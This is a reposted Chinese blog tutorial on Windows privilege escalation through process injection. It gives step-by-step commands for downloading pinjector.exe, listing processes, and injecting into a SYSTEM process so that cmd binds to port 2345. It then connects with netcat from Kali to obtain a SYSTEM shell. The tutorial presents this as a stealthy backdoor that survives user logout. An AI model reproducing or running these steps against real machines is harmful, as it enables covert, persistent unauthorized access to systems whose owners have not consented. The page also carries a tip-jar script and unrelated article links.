博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【提权】注入进程提权
阅读量:7103 次
发布时间:2019-06-28

本文共 1101 字,大约阅读时间需要 3 分钟。

注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】

注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。

下面是图文教程。

0x01

从http://www.tarasco.org/security/Process_Injector/  下载pinjector.exe文件。放在windows2003server的c盘根目录。

0x02将压缩包中的pinjector.exe提取出放在c盘根目录。

0x03执行pinjector.exe -l 可查看可以注入的进程。

可以看到不同的进程对应不同PID和用户。

0x04执行pinjector.exe -p 600 cmd 2345   注入进程pid为600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程。

0x05使用kali的nc 192.168.70.135 2345

反弹shell并提权为system。

 

 

<script>

window.tctipConfig = {
staticPrefix: "http://static.tctip.com",
buttonImageId: 1,
buttonTip: "zanzhu",
list:{
alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},
weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},
}
};
</script>
<script src="http://static.tctip.com/js/tctip.min.js"></script>

 

#####################################################################################################################

总结

将进程注入system服务进程

pinjector.exe进程注入器

 {需要FQ下载}

###pinjector.exe -l#查看可注入进程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>    //监听端口。成功后会反弹system的shell。

转载于:https://www.cnblogs.com/NBeveryday/p/6239351.html

你可能感兴趣的文章
ios的自动转屏
查看>>
【C】——fread函数和read函数的区别
查看>>
js中push和join方法使用介绍
查看>>
Webservices-2.C#创建web服务,及引用访问、代码访问
查看>>
js控制页面的全屏展示和退出全屏显示
查看>>
程序猿的量化交易之路(26)--Cointrader之Listing挂牌实体(13)
查看>>
《Struts2技术内幕》学习笔记
查看>>
开发指南专题八:JEECG微云高速开发平台数据字典
查看>>
CI框架 -- 核心文件 之 Output.php(输出类文件)
查看>>
动态更换view类的背景----StateListDrawable的应用
查看>>
scrapy-redis实现爬虫分布式爬取分析与实现
查看>>
Android仿微信UI布局视图(圆角布局的实现)
查看>>
docker
查看>>
OKR 方法 学习笔记
查看>>
CG资源网 - Maya教程
查看>>
http://blog.sina.com.cn/s/blog_62e1faba010147k4.html
查看>>
CSS默认可继承样式
查看>>
数据库中树形结构的表的设计
查看>>
关于Cocos2d-x的瓦片地图
查看>>
位置无关码
查看>>